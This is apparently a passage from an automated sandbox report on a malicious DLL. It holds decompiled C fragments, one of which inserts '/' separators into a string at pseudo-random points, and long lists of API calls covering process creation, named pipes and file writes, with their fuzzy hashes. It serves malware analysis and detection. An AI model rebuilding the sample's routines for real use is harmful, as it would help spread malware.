                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx); // lstrlen (see APIs below); length returned in eax
                				_t38 = __eax;                                  // remaining bytes to copy
                				_t30 = RtlAllocateHeap( *0x1c1a290, 0, (__eax >> 3) + __eax + 1);   // len + one separator per 8 bytes + NUL
                				_v12 = _t30;
                				if(_t30 != 0) {
                					_v8 = _t42;                                // read cursor into the source string
                					do {
                						_t33 = 0x18;                           // chunk cap: 24 bytes
                						if(_t38 <= _t33) {
                							_t33 = _t38;                       // fewer than 24 bytes left: cap at the remainder
                						}
                						_t21 =  *0x1c1a2a8; // 0x68e6c898      // seed of a linear congruential generator
                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;   // LCG step with constants 0x19660d / 0x3c6ef35f
                						 *0x1c1a2a8 = _t23;                    // store the new seed
                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;   // chunk size in [8, _t33 - 1]; loop guard keeps _t33 > 8
                						memcpy(_t30, _v8, _t45);               // copy one chunk
                						_v8 = _v8 + _t45;
                						_t27 = _t30 + _t45;
                						_t38 = _t38 - _t45;
                						_t46 = _t46 + 0xc;                     // stack adjustment after the cdecl call, left by the decompiler
                						 *_t27 = 0x2f;                         // write a '/' separator after the chunk
                						_t13 = _t27 + 1; // 0x1
                						_t30 = _t13;                           // write cursor past the separator
                					} while (_t38 > 8);
                					memcpy(_t30, _v8, _t38 + 1);               // copy the tail including the NUL terminator
                				}
                				return _v12;                                   // new heap string with '/' inserted at pseudo-random positions
                			}

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01C15357,00000000,?,?,01C17675,?,021795B0), ref: 01C12A59
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 01C12A71
                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,01C15357,00000000,?,?,01C17675,?,021795B0), ref: 01C12AB5
                • memcpy.NTDLL(00000001,?,00000001), ref: 01C12AD6
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: a5aa25a0ce7ee890d903fa37788444189e29505296bbd1f88199cc14db6c5805
                • Instruction ID: 1e257c7405b9937983c147a03d17cb294aa1491b8e69bc94c3792032d6ca79d9
                • Opcode Fuzzy Hash: a5aa25a0ce7ee890d903fa37788444189e29505296bbd1f88199cc14db6c5805
                • Instruction Fuzzy Hash: CB115572A40159FFC3208B69DC84E9EBFFEEB92260B150176F50AD7244EA71DE0097A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C6535,00000000,?,?,046D09CA,00000000,04C9C0E0), ref: 046D102E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D1046
                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,046C6535,00000000,?,?,046D09CA,00000000,04C9C0E0), ref: 046D108A
                • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 046D10AB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: 32e462be2dd9d5abcf4ec4bda508bda322ad2b98124c2f5212ab32a218f5d44b
                • Instruction ID: 7e737c6342b33d224e2b5aab427ab896386f0358ad4b34a0c6a9b27734cec157
                • Opcode Fuzzy Hash: 32e462be2dd9d5abcf4ec4bda508bda322ad2b98124c2f5212ab32a218f5d44b
                • Instruction Fuzzy Hash: 82112972E00258AFD710DF6ADC84DDEBBEDDB92260B040176F805DB240FAB5AE4487A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GlobalFix.KERNEL32(00000000), ref: 046DB30B
                • memset.NTDLL ref: 046DB31F
                • GetWindowThreadProcessId.USER32(00000000,?), ref: 046DB32C
                  • Part of subcall function 046CED0A: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 046CED64
                  • Part of subcall function 046CED0A: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C), ref: 046CED82
                  • Part of subcall function 046CED0A: GetSystemTimeAsFileTime.KERNEL32(?), ref: 046CEDE8
                • GlobalUnWire.KERNEL32(00000000), ref: 046DB357
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                • String ID:
                • API String ID: 3286078456-0
                • Opcode ID: 69988ecc52acd52666ead1dcf40e95727693aea30c8df9141566f200deca6cdc
                • Instruction ID: 1fd82963d85e917bc4b62448320150ee16d4514cf46410e55634ae71fb6d37a0
                • Opcode Fuzzy Hash: 69988ecc52acd52666ead1dcf40e95727693aea30c8df9141566f200deca6cdc
                • Instruction Fuzzy Hash: 47118A71D00706AFD711AFA59848BEE77FCEF48B10F055016F905E6240FB75E9008B65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,046D432D,00000000,00000000), ref: 046E50DC
                • GetLastError.KERNEL32(?,00000000,?,046D432D,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,046D5B52,?,0000001E), ref: 046E50E4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ByteCharErrorLastMultiWide
                • String ID:
                • API String ID: 203985260-0
                • Opcode ID: f50059e85af205e50f1db94e27db7dc4ded3d1f65478a91b158dca4595042074
                • Instruction ID: 34a0c1ce7d198f82a763446f91db03aef3166cab2c018f37b7856a162c44071c
                • Opcode Fuzzy Hash: f50059e85af205e50f1db94e27db7dc4ded3d1f65478a91b158dca4595042074
                • Instruction Fuzzy Hash: 3801D436149251BF8730AE678C4CC7BBAEDEBC6768B10461DF47293280FA21A801C671
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000008,?,00000008,00000000,?,?,046C6761,?,?,?,?,?,?,?,?,?), ref: 046CB928
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • mbstowcs.NTDLL ref: 046CB942
                • lstrlen.KERNEL32(?,?,00000008), ref: 046CB94D
                • mbstowcs.NTDLL ref: 046CB967
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD43D
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD490
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?), ref: 046DD498
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD4BB
                  • Part of subcall function 046DD39D: wcscpy.NTDLL ref: 046DD4CD
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                • String ID:
                • API String ID: 1961997177-0
                • Opcode ID: edb3090a28538d360f2fb1941c6723f371362cb6c33af29d5c72270d8a8c00ad
                • Instruction ID: ccf5ee6b45d9372681470acdc628d271339027a85c69a93653a0d449965efdf3
                • Opcode Fuzzy Hash: edb3090a28538d360f2fb1941c6723f371362cb6c33af29d5c72270d8a8c00ad
                • Instruction Fuzzy Hash: 2701B173900204BBDB227BA59C86FAF7BADEF85754F10442EB60597100FAB5F91087A8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?), ref: 046DA478
                • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 046DA49E
                • lstrcpy.KERNEL32(00000014,?), ref: 046DA4C3
                • memcpy.NTDLL(?,?,?), ref: 046DA4D0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 1388643974-0
                • Opcode ID: fa48bc7c485417f7dd0de3233b3f986eb1d015e42c012b5de0c3088fd20c6fab
                • Instruction ID: 3bf6c494a88482ff32df9ac053e287b59ff1530ba73e3198125513701ee04847
                • Opcode Fuzzy Hash: fa48bc7c485417f7dd0de3233b3f986eb1d015e42c012b5de0c3088fd20c6fab
                • Instruction Fuzzy Hash: 8C11467190470AEFC721DF58D884E9ABBF8FB48714F10842EF85A8B610E775E954DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,046DAB7C,?,00000000,00000000), ref: 046C27C8
                • lstrlen.KERNEL32(04C9BF48,?,046DAB7C,?,00000000,00000000), ref: 046C27E9
                • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 046C2801
                • lstrcpy.KERNEL32(00000000,04C9BF48), ref: 046C2813
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                • String ID:
                • API String ID: 1929783139-0
                • Opcode ID: 63133f023c85835c8e29b8576a9cf7eab542b69ee6e220a7a3d9c18f01d959e4
                • Instruction ID: c621ac782c182aebea1166ab2b006347f53458c6c51e80fa19185c7a1c9688fb
                • Opcode Fuzzy Hash: 63133f023c85835c8e29b8576a9cf7eab542b69ee6e220a7a3d9c18f01d959e4
                • Instruction Fuzzy Hash: C101C876904244EBD311EBADE884E6FBBFCEB88204F04406DED09D7241F6359A48C771
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • RtlInitializeCriticalSection.NTDLL(046EE480), ref: 046D614A
                • RtlInitializeCriticalSection.NTDLL(046EE460), ref: 046D6160
                • GetVersion.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D6171
                • GetModuleHandleA.KERNEL32(000015DB,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D61A5
                  • Part of subcall function 046CADC7: GetModuleHandleA.KERNEL32(?,00000001,77639EB0,00000000,?,?,?,?,00000000,046D6188), ref: 046CADDF
                  • Part of subcall function 046CADC7: LoadLibraryA.KERNEL32(?), ref: 046CAE80
                  • Part of subcall function 046CADC7: FreeLibrary.KERNEL32(00000000), ref: 046CAE8B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                • String ID:
                • API String ID: 1711133254-0
                • Opcode ID: 233a868f03ad63000f17388493c8e0f634d4e08efbb7718cedc636cadfd93baf
                • Instruction ID: 1009e1f0731bc1c5e2a69a12ccfa476a579618d0c9872da951158f32f828b4c7
                • Opcode Fuzzy Hash: 233a868f03ad63000f17388493c8e0f634d4e08efbb7718cedc636cadfd93baf
                • Instruction Fuzzy Hash: 44118071E11311DFE710AFABE8456153BE4F78C318B00292AE105DB242F77ABC448F54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?,7673D3B0,?,74E05520,046C3184,00000000,?,?,?,74E5F710,00000000,00000000), ref: 046C73E7
                • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 046C73FF
                • memcpy.NTDLL(0000000C,?,00000001), ref: 046C7415
                  • Part of subcall function 046E2ADA: StrChrA.SHLWAPI(00000020,?,7673D3B0,04C9C0D4,00000000,?,046E321D,?), ref: 046E2AFF
                  • Part of subcall function 046E2ADA: StrTrimA.SHLWAPI(00000020,046EA4A4,00000000,?,046E321D,?), ref: 046E2B1E
                  • Part of subcall function 046E2ADA: StrChrA.SHLWAPI(00000020,?,?,046E321D,?), ref: 046E2B2A
                • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 046C7447
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                • String ID:
                • API String ID: 3208927540-0
                • Opcode ID: 94b6134d7408db73b9d2ae7d69bcfdae0dfce5f7eb250ae1dc36fb46c50f8569
                • Instruction ID: 6bc48f96ac4732f66e0b4b3369c977e7db94c15d27c187a938fa1b0496e83947
                • Opcode Fuzzy Hash: 94b6134d7408db73b9d2ae7d69bcfdae0dfce5f7eb250ae1dc36fb46c50f8569
                • Instruction Fuzzy Hash: 83018431740306ABE3219F16EC48F777FE9EB90B52F00C029F6099A180F765AC55AF61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D06CA
                • Sleep.KERNEL32(0000000A,?,?,?,046C8E76,00000000,?,00000029,046EE218,046C7EA7,?), ref: 046D06D4
                • SetEvent.KERNEL32(?,?,?,046C8E76,00000000,?,00000029,046EE218,046C7EA7,?), ref: 046D072B
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D074A
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterEventLeaveSleep
                • String ID:
                • API String ID: 1925615494-0
                • Opcode ID: 064b0c89748a9cdef0fafa0811e07343c071f1cb7b7cec4280a49178417c192a
                • Instruction ID: 05b7757f8853a19d5c91d38e570d9861a9209c9bcb9b4564c0f9d42d84228ef5
                • Opcode Fuzzy Hash: 064b0c89748a9cdef0fafa0811e07343c071f1cb7b7cec4280a49178417c192a
                • Instruction Fuzzy Hash: DA0152B0B40205FBE700AFA2DC49B9A37E8EB15715F005411F609EF180F7BAED048BA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CAD65: lstrlen.KERNEL32(00000000,00000000,00000000,046D983E,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 046CAD6A
                  • Part of subcall function 046CAD65: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 046CAD7F
                  • Part of subcall function 046CAD65: wsprintfA.USER32 ref: 046CAD9B
                  • Part of subcall function 046CAD65: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 046CADB7
                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 046E3F6F
                • GetFileSize.KERNEL32(00000000,00000000), ref: 046E3F7E
                • CloseHandle.KERNEL32(00000000), ref: 046E3F88
                • GetLastError.KERNEL32 ref: 046E3F90
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                • String ID:
                • API String ID: 4042893638-0
                • Opcode ID: 98069e208d297d93991021e8457e006cbd8152b60c4063ede6305d85d7cf1c3b
                • Instruction ID: c427ceecc83241372bd77002f9d06581f757d4d5d3f07c643c450304d4cfdf75
                • Opcode Fuzzy Hash: 98069e208d297d93991021e8457e006cbd8152b60c4063ede6305d85d7cf1c3b
                • Instruction Fuzzy Hash: 6CF0D631206214BAD3202F66DC4CF6F7EACEF41760F108119F905D7280F634A581C6B4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedExchange.KERNEL32(046EE0E0,00000000), ref: 046E2608
                • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 046E2623
                • lstrcpy.KERNEL32(00000000,?), ref: 046E264C
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046E266D
                  • Part of subcall function 046D1D5B: SetEvent.KERNEL32(?,?,046CCE97), ref: 046D1D70
                  • Part of subcall function 046D1D5B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,046CCE97), ref: 046D1D90
                  • Part of subcall function 046D1D5B: CloseHandle.KERNEL32(00000000,?,046CCE97), ref: 046D1D99
                  • Part of subcall function 046D1D5B: CloseHandle.KERNEL32(?,?,?,046CCE97), ref: 046D1DA3
                  • Part of subcall function 046D1D5B: RtlEnterCriticalSection.NTDLL(?), ref: 046D1DAB
                  • Part of subcall function 046D1D5B: RtlLeaveCriticalSection.NTDLL(?), ref: 046D1DC3
                  • Part of subcall function 046D1D5B: CloseHandle.KERNEL32(?), ref: 046D1DDF
                  • Part of subcall function 046D1D5B: LocalFree.KERNEL32(?), ref: 046D1DEA
                  • Part of subcall function 046D1D5B: RtlDeleteCriticalSection.NTDLL(?), ref: 046D1DF4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                • String ID:
                • API String ID: 1103286547-0
                • Opcode ID: 33c97bdb69696df03a3501144aba2b0d587fa49ccef94f86370cca62ffe5d57e
                • Instruction ID: 1a0025ab2acabb5d1bbc9d61eeace7ef025dadd82366054e9ed49fbb8ece0e27
                • Opcode Fuzzy Hash: 33c97bdb69696df03a3501144aba2b0d587fa49ccef94f86370cca62ffe5d57e
                • Instruction Fuzzy Hash: FFF0D131741211A7E7206A23EC09F563BA9EB85720F000425F204AB290FA66AC15CB74
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrcatW.KERNEL32(?,?), ref: 046D4ACD
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                  • Part of subcall function 046E36FE: GetLastError.KERNEL32 ref: 046E3749
                  • Part of subcall function 046E36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                  • Part of subcall function 046E36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                  • Part of subcall function 046E36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                  • Part of subcall function 046E36FE: SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                  • Part of subcall function 046E36FE: CloseHandle.KERNEL32(00000006), ref: 046E37F1
                • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,046D718A,?,?,00001000,?,?,00001000), ref: 046D4AF0
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,046D718A,?,?,00001000,?,?,00001000), ref: 046D4B12
                • GetLastError.KERNEL32(?,046D718A,?,?,00001000,?,?,00001000), ref: 046D4B26
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                • String ID:
                • API String ID: 3370347312-0
                • Opcode ID: add598944a2d850439cd165d0d209c8b806f294f00faeae63b83f31706a8a967
                • Instruction ID: 1292c3338477892dfd20ad1a60d9d6cff8c9acd89a0a65feb728fdfb829728f0
                • Opcode Fuzzy Hash: add598944a2d850439cd165d0d209c8b806f294f00faeae63b83f31706a8a967
                • Instruction Fuzzy Hash: 98F0C831240204BBDB255F62EC0DF5A3B55EF24711F100004F601DA1D0FB79AD229B69
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,046D05CD,000000FF,04C9B7F0,?,?,046CD134,0000003A,04C9B7F0), ref: 046E2B83
                • GetLastError.KERNEL32(?,?,046CD134,0000003A,04C9B7F0,?,?,?,046C902F,00000001,?), ref: 046E2B8E
                • WaitNamedPipeA.KERNEL32(00002710), ref: 046E2BB0
                • WaitForSingleObject.KERNEL32(00000000,?,?,046CD134,0000003A,04C9B7F0,?,?,?,046C902F,00000001,?), ref: 046E2BBE
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                • String ID:
                • API String ID: 4211439915-0
                • Opcode ID: 1ce208dfab62046ced216736e31f7fa76e6a258ef147eb0ff0f124c0a8d66d77
                • Instruction ID: 2b40f5386e617adcf916edd9c3348e6e3f1febb332d067c5043c9fb057e08456
                • Opcode Fuzzy Hash: 1ce208dfab62046ced216736e31f7fa76e6a258ef147eb0ff0f124c0a8d66d77
                • Instruction Fuzzy Hash: 3AF09631A01120ABE3302E67EC5CFA67FDAEB50775F114561F915EB2D0F2761C81CA60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,046D983E,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 046CAD6A
                • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 046CAD7F
                • wsprintfA.USER32 ref: 046CAD9B
                  • Part of subcall function 046E2BDD: memset.NTDLL ref: 046E2BF2
                  • Part of subcall function 046E2BDD: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 046E2C2B
                  • Part of subcall function 046E2BDD: wcstombs.NTDLL ref: 046E2C35
                  • Part of subcall function 046E2BDD: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 046E2C66
                  • Part of subcall function 046E2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2C92
                  • Part of subcall function 046E2BDD: TerminateProcess.KERNEL32(?,000003E5), ref: 046E2CA8
                  • Part of subcall function 046E2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2CBC
                  • Part of subcall function 046E2BDD: CloseHandle.KERNEL32(?), ref: 046E2CEF
                  • Part of subcall function 046E2BDD: CloseHandle.KERNEL32(?), ref: 046E2CF4
                • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 046CADB7
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                • String ID:
                • API String ID: 1624158581-0
                • Opcode ID: fe39a5ff7f661ac7e1919fd986f787495a05c6c3a1500da33e39bd52290b4bc7
                • Instruction ID: 174d76eb2e16e9ecd50eb7a2c7eada13b301322b6242cba667967d6fd639600c
                • Opcode Fuzzy Hash: fe39a5ff7f661ac7e1919fd986f787495a05c6c3a1500da33e39bd52290b4bc7
                • Instruction Fuzzy Hash: 76F0B432601115BBD321671BFC08F677AEDDBC1721F141125F801DB290F668DC558A70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E31D9
                • Sleep.KERNEL32(0000000A), ref: 046E31E3
                • HeapFree.KERNEL32(00000000,?), ref: 046E320B
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E3229
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: 9828536a65d425411415ea1933915d4412b177ca79de617ac281214039844fb9
                • Instruction ID: 376f9fbc717474cee5ffcbd3e4ca9144607bda535883e7f6d8e8e49493a736eb
                • Opcode Fuzzy Hash: 9828536a65d425411415ea1933915d4412b177ca79de617ac281214039844fb9
                • Instruction Fuzzy Hash: E3F01730201201DFE7209F2BDC48F263BE4EB28340B049014F841DB252F23AFC99DA24
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C120C0() {
                				void* _t1;
                				intOrPtr _t5;
                				void* _t6;
                				void* _t7;
                				void* _t11;
                
                				_t1 =  *0x1c1a2c4; // 0x10c
                				if(_t1 == 0) {
                					L8:
                					return 0;
                				}
                				SetEvent(_t1);
                				_t11 = 0x7fffffff;
                				while(1) {
                					SleepEx(0x64, 1);
                					_t5 =  *0x1c1a314; // 0x0
                					if(_t5 == 0) {
                						break;
                					}
                					_t11 = _t11 - 0x64;
                					if(_t11 > 0) {
                						continue;
                					}
                					break;
                				}
                				_t6 =  *0x1c1a2c4; // 0x10c
                				if(_t6 != 0) {
                					CloseHandle(_t6);
                				}
                				_t7 =  *0x1c1a290; // 0x1d80000
                				if(_t7 != 0) {
                					HeapDestroy(_t7);
                				}
                				goto L8;
                			}

                APIs
                • SetEvent.KERNEL32(0000010C,00000001,01C11B72), ref: 01C120CB
                • SleepEx.KERNEL32(00000064,00000001), ref: 01C120DA
                • CloseHandle.KERNEL32(0000010C), ref: 01C120FB
                • HeapDestroy.KERNEL32(01D80000), ref: 01C1210B
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CloseDestroyEventHandleHeapSleep
                • String ID:
                • API String ID: 4109453060-0
                • Opcode ID: ab5e77551a5b6fbc8af0cd96ff727527cfc3e63054b0c07cdaaa4207982a449b
                • Instruction ID: 2265e2e4b69c7682c71c2a577cfd1e875cf58517b167793d4a731332027e116f
                • Opcode Fuzzy Hash: ab5e77551a5b6fbc8af0cd96ff727527cfc3e63054b0c07cdaaa4207982a449b
                • Instruction Fuzzy Hash: 30F012797C12219BEB309A7899487467AADBB27A517240110BE06D318DDA35C9009760
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E365E
